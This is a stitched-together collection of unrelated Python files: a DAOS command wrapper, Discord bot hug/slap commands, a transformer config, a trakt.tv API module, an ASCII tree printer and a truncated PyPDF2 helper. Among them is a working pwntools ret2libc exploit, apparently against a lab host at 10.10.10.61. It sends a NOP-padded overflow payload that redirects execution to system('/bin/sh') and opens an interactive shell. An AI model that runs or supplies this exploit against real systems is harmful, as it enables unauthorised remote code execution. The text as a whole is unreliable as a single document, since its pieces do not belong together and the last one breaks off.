CommandFailure: if the daos container update-acl command fails.
"""
return self._get_result(
("container", "update-acl"), pool=pool, cont=cont,
entry=entry, acl_file=acl_file)
def container_list(self, pool, sys_name=None):
"""List containers in the given pool.
Args:
pool (str): Pool label or UUID
sys_name (str, optional): System name. Defaults to None.
Returns:
dict: JSON output
Raises:
CommandFailure: if the daos container list command fails.
"""
# Sample output.
# {
# "response": [
# {
# "UUID": "bad80a98-aabd-498c-b001-6547cd061c8c",
# "Label": "container_label_not_set"
# },
# {
# "UUID": "dd9fc365-5729-4736-9d34-e46504a4a92d",
# "Label": "mkc1"
# }
# ],
# "error": null,
# "status": 0
# }
return self._get_json_result(
("container", "list"), pool=pool, sys_name=sys_name)
def pool_set_attr(self, pool, attr, value, sys_name=None):
"""Set pool attribute.
Args:
pool (str): Pool UUID.
attr (str): Attribute name.
value (str): Attribute value.
sys_name (str): DAOS system name. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool set-attr command fails.
"""
return self._get_result(
("pool", "set-attr"), pool=pool, attr=attr, value=value,
sys_name=sys_name)
def pool_get_attr(self, pool, attr, sys_name=None):
"""Set pool attribute.
Args:
pool (str): Pool UUID.
attr (str): Attribute name.
sys_name (str): DAOS system name. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool get-attr command fails.
"""
return self._get_json_result(
("pool", "get-attr"), pool=pool, attr=attr, sys_name=sys_name)
def pool_list_attrs(self, pool, sys_name=None, verbose=False):
"""List pool attributes.
Args:
pool (str): Pool UUID.
sys_name (str): DAOS system name. Defaults to None.
verbose (bool): False - name only. True - name and value. Defaults
to False.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool list-attrs command fails.
"""
return self._get_json_result(
("pool", "list-attrs"), pool=pool, sys_name=sys_name,
verbose=verbose)
def container_query(self, pool, cont, sys_name=None):
"""Query a container.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container query command fails.
"""
return self._get_result(
("container", "query"), pool=pool, cont=cont,
sys_name=sys_name)
def container_set_prop(self, pool, cont, prop, value):
"""Call daos container set-prop.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
prop (str): Container property-name.
value (str): Container property-name value to set.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-prop command fails.
"""
prop_value = ":".join([prop, value])
return self._get_result(
("container", "set-prop"),
pool=pool, cont=cont, prop=prop_value)
def container_get_prop(self, pool, cont):
"""Call daos container get-prop.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container get-prop command fails.
"""
return self._get_result(
("container", "get-prop"), pool=pool, cont=cont)
def container_set_owner(self, pool, cont, user, group):
"""Call daos container set-owner.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
user (str): New-user who will own the container.
group (str): New-group who will own the container.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-owner command fails.
"""
return self._get_result(
("container", "set-owner"),
pool=pool, cont=cont, user=user, group=group)
def container_set_attr(
self, pool, cont, attr, val, sys_name=None):
"""Call daos container set-attr.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
attr (str): Attribute name.
val (str): Attribute value.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-attr command fails.
"""
return self._get_result(
("container", "set-attr"), pool=pool, cont=cont,
sys_name=sys_name, attr=attr, value=val)
def container_get_attr(self, pool, cont, attr, sys_name=None):
"""Call daos container get-attr.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
attr (str): Attribute name.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the attribute and value in "attr" and
"value" key.
Raises:
CommandFailure: if the daos get-attr command fails.
"""
self._get_result(
("container", "get-attr"), pool=pool, cont=cont,
sys_name=sys_name, attr=attr)
# Sample output.
# Container's `&()\;'"!<> attribute value: attr12
match = re.findall(
r"Container's\s+([\S ]+)\s+attribute\s+value:\s+(.+)$",
self.result.stdout_text)
data = {}
if match:
data["attr"] = match[0][0]
data["value"] = match[0][1]
return data
def container_list_attrs(self, pool, cont, sys_name=None):
"""Call daos container list-attrs.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the attribute values in the key "attrs"
Raises:
CommandFailure: if the daos container list-attrs command fails.
"""
self._get_result(
("container", "list-attrs"), pool=pool, cont=cont,
sys_name=sys_name)
# Sample output.
# Container attributes:
# attr0
# ~@#$%^*-=_+[]{}:/?,.
# aa bb
# attr48
match = re.findall(r"\n([\S ]+)", self.result.stdout_text)
return {"attrs": match}
def container_create_snap(self, pool, cont, snap_name=None, epoch=None,
sys_name=None):
"""Call daos container create-snap.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
snap_name (str, optional): Snapshot name. Defaults to None.
epoch (str, optional): Epoch number. Defaults to None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the created epoch in the key "epoch".
Raises:
CommandFailure: if the daos container create-snap command fails.
"""
self._get_result(
("container", "create-snap"), pool=pool, cont=cont,
sys_name=sys_name, snap=snap_name, epc=epoch)
# Sample create-snap output.
# snapshot/epoch 1582610056530034697 has been created
data = {}
match = re.findall(
r"[A-Za-z\/]+\s([0-9]+)\s[a-z\s]+", self.result.stdout_text)
if match:
data["epoch"] = match[0]
return data
def container_destroy_snap(self, pool, cont, snap_name=None, epc=None,
sys_name=None, epcrange=None):
"""Call daos container destroy-snap.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
snap_name (str, optional): Snapshot name. Defaults to None.
epc (str, optional): Epoch value of the snapshot to be destroyed.
Defaults to None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
epcrange (str, optional): Epoch range in the format "<start>-<end>".
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container destroy-snap command fails.
"""
kwargs = {
"pool": pool,
"cont": cont,
"sys_name": sys_name,
"snap": snap_name,
"epc": epc,
"epcrange": epcrange
}
return self._get_result(("container", "destroy-snap"), **kwargs)
def container_list_snaps(self, pool, cont):
"""List snapshot in a container.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
Returns:
dict: Dictionary that contains epoch values in key "epochs". Value
is a list of string.
"""
self._get_result(
("container", "list-snaps"), pool=pool, cont=cont)
# Sample container list-snaps output.
# Container's snapshots :
# 1598478249040609297 1598478258840600594 1598478287952543761
data = {}
match = re.findall(r"(\d+)", self.result.stdout_text)
if match:
data["epochs"] = match
return data
def object_query(self, pool, cont, oid, sys_name=None):
"""Call daos object query and return its output with a dictionary.
Args:
pool (str): Pool UUID
cont (str): Container UUID
oid (str): oid hi lo value in the format <hi>.<lo>
sys_name (str, optional): System name. Defaults to None.
Returns:
dict: cmd output
oid: (oid.hi, oid.lo)
ver: num
grp_nr: num
layout: [{grp: num, replica: [(n0, n1), (n2, n3)...]}, ...]
Each row of replica nums is a tuple and stored top->bottom.
Raises:
CommandFailure: if the daos object query command fails.
"""
self._get_result(
("object", "query"), pool=pool, cont=cont,
oid=oid, sys_name=sys_name)
# Sample daos object query output.
# oid: 1152922453794619396.1 ver 0 grp_nr: 2
# grp: 0
# replica 0 1
# replica 1 0
# grp: 1
# replica 0 0
# replica 1 1
data = {}
vals = re.findall(
r"oid:\s+([\d.]+)\s+ver\s+(\d+)\s+grp_nr:\s+(\d+)|"\
r"grp:\s+(\d+)\s+|"\
r"replica\s+(\d+)\s+(\d+)\s*", self.result.stdout_text)
try:
oid_vals = vals[0][0]
oid_list = oid_vals.split(".")
oid_hi = oid_list[0]
oid_lo = oid_list[1]
data["oid"] = (oid_hi, oid_lo)
data["ver"] = vals[0][1]
data["grp_nr"] = vals[0][2]
data["layout"] = []
for i in range(1, len(vals)):
if vals[i][3] == "":
if "replica" in data["layout"][-1]:
data["layout"][-1]["replica"].append(
(vals[i][4], vals[i][5]))
else:
data["layout"][-1]["replica"] = [(
vals[i][4], vals[i][5])]
else:
data["layout"].append({"grp": vals[i][3]})
except IndexError:
traceback.print_exc()
self.log.error("--- re.findall output ---")
self.log.error(vals)
return data
def filesystem_copy(self, src, dst):
"""Copy a POSIX container or path to another POSIX container or path.
Args:
src (str): The source, formatted as
daos:<pool>/<cont>/<path> or posix:<path>
dst (str): The destination, formatted as
daos:<pool>/<cont>/<path> or posix:<path>
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos filesystem copy command fails.
"""
return self._get_result(
("filesystem", "copy"), src=src, dst=dst)
|
import random
import discord
from discord.ext import commands
from cogs.utils.tools import resolve_emoji
class Action:
def __init__(self, bot):
self.bot = bot
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def cuddle(self, ctx):
"""For when you just need to cuddle someone uwu"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is cuddling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***cuddles with you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="cuddle", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename='cuddle.gif'))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def hug(self, ctx):
"""Give a person a big fat hug! Awww!"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is hugging **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***hugs*** Are you okay now, **{ctx.author.display_name}**?'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="hug", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="hug.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def slap(self, ctx):
"""What the hell did you just say to me? I'm gonna slap you to the moon for that comment!"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is slapping **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'**Uh, okay. Sure. _slaps_**'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="slap", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="slap.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def kiss(self, ctx):
"""Give that special someone a kiss! <3"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is kissing **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'I\'ll kiss you! *kisses*'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="kiss", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="kiss.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def pat(self, ctx):
"""Send a pat over to a person or a few people. Sometimes a pat speaks words that words cannot.
Or maybe I just really like pats so I endorse them. Whichever one it is."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is patting **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***pats you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="pat", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="pat.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def poke(self, ctx):
"""Do you ever have a friend who just wont stop ignoring you? Just poke them. :eyes:"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is poking **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'*pokes you* hi. *pokes more*'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="poke", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="poke.gif"))
@commands.command(aliases=["teehee"], usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def tease(self, ctx):
"""Hehe. The command for when you want to be a little joker and tease someone."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is teasing **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'*teases you* hehe'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="teehee", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="tease.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def stare(self, ctx):
"""The command for when you have no clue what to say to someone, so you just stare..."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is staring at **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**..."
if ctx.author in ctx.message.mentions:
msg = f'***stares at you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="stare", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="stare.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def wakeup(self, ctx):
"""A way to get your friends off of their lazy butts and wake up."""
imgs = ["./images/wakeupa.gif", "./images/wakeupb.gif", "./images/wakeupc.gif", "./images/wakeupd.gif", "./images/wakeupe.gif", "./images/wakeupf.gif", "./images/wakeupg.gif", "./images/wakeuph.gif"]
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is telling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}** to wake up!"
if ctx.author in ctx.message.mentions:
msg = 'Uh, don\'t you need to be awake to send a message? Oh well. Wake up!'
await ctx.send(content=msg, file=discord.File(random.choice(imgs)))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def sleep(self, ctx):
"""The literal opposite of wakeup. This is also based off of my best friend, Kitty#4867, who would always tell me to go to bed. Love ya, Kat! ~Desii"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is telling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}** to sleep!"
if ctx.author in ctx.message.mentions:
msg = f'**Self-discipline! I like it! Go sleep!**'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="sleepy", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="sleep.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def cry(self, ctx):
"""When life gets at you and you just wanna let it all out."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is crying!'
else:
msg = f"**{ctx.author.display_name}** is crying because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="cry", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="cry.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def triggered(self, ctx):
"""**T R I G G E R E D**"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is triggered! REEEEEEEEEEEEEE'
else:
msg = f"**{ctx.author.display_name}** is triggered because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="triggered", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="triggered.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def think(self, ctx):
"""You ever think about stuff, man?"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is thinking...'
else:
msg = f"**{ctx.author.display_name}** is thinking about **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**! o.o"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="thinking", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="thinking.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def blush(self, ctx):
"""I-it's not like I like you, b-baka!"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is blushing... Who made them blush?'
else:
msg = f"**{ctx.author.display_name}** is blushing because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**! o.o"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="blush", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="blush.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def smile(self, ctx):
"""\uD83C\uDFB6 You make me smile like the sun, fall outta bed... \uD83C\uDFB6
What? I wasn't singing!"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is smiling.'
else:
msg = f"**{ctx.author.display_name}** is smiling at**{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="smile", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="smile.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def shrug(self, ctx):
"""When you have no idea what is going on."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'***shrugs***'
else:
msg = f"**{ctx.author.display_name}** is shrugging at **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="shrug", filetype="gif"))[0])
        await ctx.send(content=msg, file=discord.File(await img.read(), filename="shrug.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def confused(self, ctx):
"""When you still have no idea what is going on."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is confused'
else:
msg = f"**{ctx.author.display_name}** is confused with **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="clagwimoth", filetype="gif"))[0])
        await ctx.send(content=msg, file=discord.File(await img.read(), filename="confused.gif"))
@commands.command()
async def kill(self, ctx, *, member: discord.Member):
"""Kill a user!
Note this command is just for fun. Nobody died in the making of this command... well maybe. *runs*"""
with open('killquotes.txt') as f:
quotes = f.readlines()
if ctx.author.id == member.id:
return await ctx.send(resolve_emoji('ERROR', ctx) + " Don't kill yourself! You're loved!")
if member.id == ctx.me.id:
return await ctx.send(resolve_emoji('ERROR', ctx) + " Nice try. <3")
await ctx.send(":knife: " + random.choice(quotes).format(member.display_name, ctx.author.display_name))
def setup(bot):
bot.add_cog(Action(bot))
|
"""Contains transformer configuration information
"""
# The version number of the transformer
TRANSFORMER_VERSION = '3.0'
# The transformer description
TRANSFORMER_DESCRIPTION = 'Hyperspectral to netCDF'
# Short name of the transformer
TRANSFORMER_NAME = 'terra.hyperspectral.raw2nc'
# The sensor associated with the transformer
TRANSFORMER_SENSOR = 'VNIR'
# The transformer type (eg: 'rgbmask', 'plotclipper')
TRANSFORMER_TYPE = 'hyperspectral'
# The name of the author of the transformer
AUTHOR_NAME = 'Charlie Zender'
# The email of the author of the transformer
AUTHOR_EMAIL = ''
# Contributors to this transformer
CONTRIBUTORS = []
# Repository URI of where the source code lives
REPOSITORY = 'https://github.com/AgPipeline/transformer-hyperspectral'
|
# -*- coding: utf-8 -*-
"""Interfaces to all of the People objects offered by the Trakt.tv API"""
from trakt.core import get
from trakt.sync import search
from trakt.utils import extract_ids, slugify
__author__ = 'Jon Nappi'
__all__ = ['Person', 'ActingCredit', 'CrewCredit', 'Credits', 'MovieCredits',
'TVCredits']
class Person(object):
"""A Class representing a trakt.tv Person such as an Actor or Director"""
def __init__(self, name, slug=None, **kwargs):
super(Person, self).__init__()
self.name = name
self.biography = self.birthplace = self.tmdb_id = self.birthday = None
self.job = self.character = self._images = self._movie_credits = None
self._tv_credits = None
self.slug = slug or slugify(self.name)
if len(kwargs) > 0:
self._build(kwargs)
else:
self._get()
@classmethod
def search(cls, name, year=None):
"""Perform a search for an episode with a title matching *title*
:param name: The name of the person to search for
:param year: Optional year to limit results to
"""
return search(name, search_type='person', year=year)
@property
def ext(self):
return 'people/{id}'.format(id=self.slug)
@property
def ext_full(self):
return self.ext + '?extended=full'
@property
def images_ext(self):
return self.ext + '?extended=images'
@property
def ext_movie_credits(self):
return self.ext + '/movies'
@property
def ext_tv_credits(self):
return self.ext + '/shows'
@get
def _get(self):
data = yield self.ext_full
self._build(data)
def _build(self, data):
extract_ids(data)
for key, val in data.items():
try:
setattr(self, key, val)
except AttributeError as ae:
if not hasattr(self, '_' + key):
raise ae
@property
def ids(self):
"""Accessor to the trakt, imdb, and tmdb ids, as well as the trakt.tv
slug
"""
return {'ids': {'trakt': self.trakt, 'slug': self.slug,
'imdb': self.imdb, 'tmdb': self.tmdb}}
@property
@get
def images(self):
"""All of the artwork associated with this :class:`Person`"""
if self._images is None:
data = yield self.images_ext
self._images = data.get('images', {})
yield self._images
@property
@get
def movie_credits(self):
"""Return a collection of movie credits that this :class:`Person` was a
cast or crew member on
"""
if self._movie_credits is None:
data = yield self.ext_movie_credits
self._movie_credits = MovieCredits(**data)
yield self._movie_credits
@property
@get
def tv_credits(self):
"""Return a collection of TV Show credits that this :class:`Person` was
a cast or crew member on
"""
if self._tv_credits is None:
data = yield self.ext_tv_credits
self._tv_credits = TVCredits(**data)
yield self._tv_credits
def __str__(self):
"""String representation of a :class:`Person`"""
return '<Person>: {0}'.format(self.name)
__repr__ = __str__
class ActingCredit(object):
"""An individual credit for a :class:`Person` who played a character in a
Movie or TV Show
"""
def __init__(self, character, media):
self.character = character
self.media = media
def __str__(self):
return '<{cls}> {character} - {title}'.format(
cls=self.__class__.__name__,
character=self.character,
title=self.media.title
)
__repr__ = __str__
class CrewCredit(object):
"""An individual crew credit for a :class:`Person` who had an off-screen
job on a Movie or a TV Show
"""
def __init__(self, job, media):
self.job = job
self.media = media
def __str__(self):
return '<{cls}> {job} - {title}'.format(
cls=self.__class__.__name__,
job=self.job,
title=self.media.title
)
__repr__ = __str__
class Credits(object):
"""A base type representing a :class:`Person`'s credits for Movies or TV
Shows
"""
MEDIA_KEY = None
def __init__(self, **kwargs):
self.cast = []
self.crew = {}
self._build(**kwargs)
def _extract_media(self, media):
"""Extract the nested media object from an individual Credit resource.
The *MEDIA_KEY* class attribute must be set by all implementing
subclasses.
"""
raise NotImplementedError
def _build_cast(self, *cast):
"""From the provided JSON array of roles a :class:`Person` has
portrayed, build a detailed list of Acting Credits.
"""
for role in cast:
character = role.get('character')
media = self._extract_media(role)
self.cast.append(
ActingCredit(character=character, media=media)
)
def _build_crew(self, **crew):
"""From the provided JSON dict of departments and crew credits, build
a dict of Crew Credits
"""
for department, jobs in crew.items():
self.crew[department] = [
CrewCredit(job=j.get('job'),
media=self._extract_media(j))
for j in jobs
]
def _build(self, **kwargs):
self._build_cast(*kwargs.get('cast', []))
self._build_crew(**kwargs.get('crew', {}))
class MovieCredits(Credits):
"""A collection of cast and crew credits for a Movie"""
MEDIA_KEY = 'movie'
def _extract_media(self, media):
from trakt.movies import Movie
data = media.get(self.MEDIA_KEY)
return Movie(**data)
class TVCredits(Credits):
"""A collection of cast and crew credits for a TV Show"""
MEDIA_KEY = 'show'
def _extract_media(self, media):
from trakt.tv import TVShow
data = media.get(self.MEDIA_KEY)
return TVShow(**data)
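# Minimal usage sketch (illustrative only; requires network access to trakt.tv,
# and the person name below is an assumption, not part of this module):
# person = Person('Bryan Cranston')
# print(person)                                 # <Person>: Bryan Cranston
# for credit in person.movie_credits.cast:
#     print(credit)                             # <ActingCredit> <character> - <title>
# for department, credits in person.tv_credits.crew.items():
#     print(department, [str(c) for c in credits])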
|
import math
def main():
"""
    This main function reads a height from user input
    and prints a christmas tree drawn with `*`, `\\` and `/`
    :return: None; the tree is printed to stdout
"""
height = int(input("Please Enter a height: "))
    if height % 2 == 0:
print("Your input should be an odd number.")
else:
# half way through the base line
print(" " * int(height/2) + "*")
# next line is the for loop for after the * up to the one before
# the last line
for h in range(int(height/2)-1): # 0 1 2 3 for the entry of 9
# these are for / s
# 3 2 1 0 spaces for the entry of 9
for _ in range(h * -1 + int(height/2)-1):
print(" ", end="")
print("/", end="")
# the end \ s are printed with this
for i in range(h*2 + 1):
print(" ", end="")
print("\\")
# for the base of the tree
print("/", end="")
print((height-2) * "_", end="")
print("\\")
if __name__ == '__main__':
    main()
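# For illustration, entering a height of 5 prints:
#   *
#  / \
# /___\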
|
# coding: utf-8
from pwn import *
# uname -a
context(os="Linux", arch="x86_64")
HOST, PORT= "10.10.10.61", 32812
r = remote(HOST, PORT)
# Padding out the buffer with NOPs
ESP_START = 0xffffcff8
EIP = 0xffffd0cc
PAD = "\x90" * (EIP - ESP_START)
SYSTEM = 0xf7e4c060
EXIT = 0xf7e3faf0
SH = 0xf7e1f65e
RET = p32(SYSTEM)
RET += p32(EXIT)
RET += p32(SH)
PAYLOAD = PAD + RET
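# Classic 32-bit ret2libc frame: the saved return address is overwritten with
# system()'s address, the next dword is the address system() "returns" to
# (exit(), for a clean exit), and the dword after that is system()'s argument,
# a pointer to a "/bin/sh" string in libc. The addresses above are target-specific.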
r.recvuntil("Enter Bridge Access Code:")
r.sendline("picarda1")
r.recvuntil("Waiting for input:")
r.sendline("4")
r.recvuntil("Enter Security Override:")
r.sendline(PAYLOAD)
r.interactive()
|
import PyPDF2
import os
#https://realpython.com/pdf-python/
def extract_information(pdf_path: str):
if not os.path.exists(pdf_path):
raise Exception(f"{pdf_path} doesn't exist")
with open(pdf_path , 'rb') as pdf_file:
pdf = PyPDF2.PdfFileReader(pdf_file)
information = pdf.getDocumentInfo()
number_of_pages = pdf.getNumPages()
txt = f"""
Information about {pdf_path}
Author: {information.author}.
Creator: {information.creator}.
Producer: {information.producer}.
Subject: {information.subject}.
Title: {information.title}.
Number of pages: {number_of_pages}.
"""
print(txt)
return information
def rotate_page(pdf_path):
pdf_reader = PyPDF2.PdfFileReader(pdf_path)
pdf_writer = PyPDF2.PdfFileWriter()
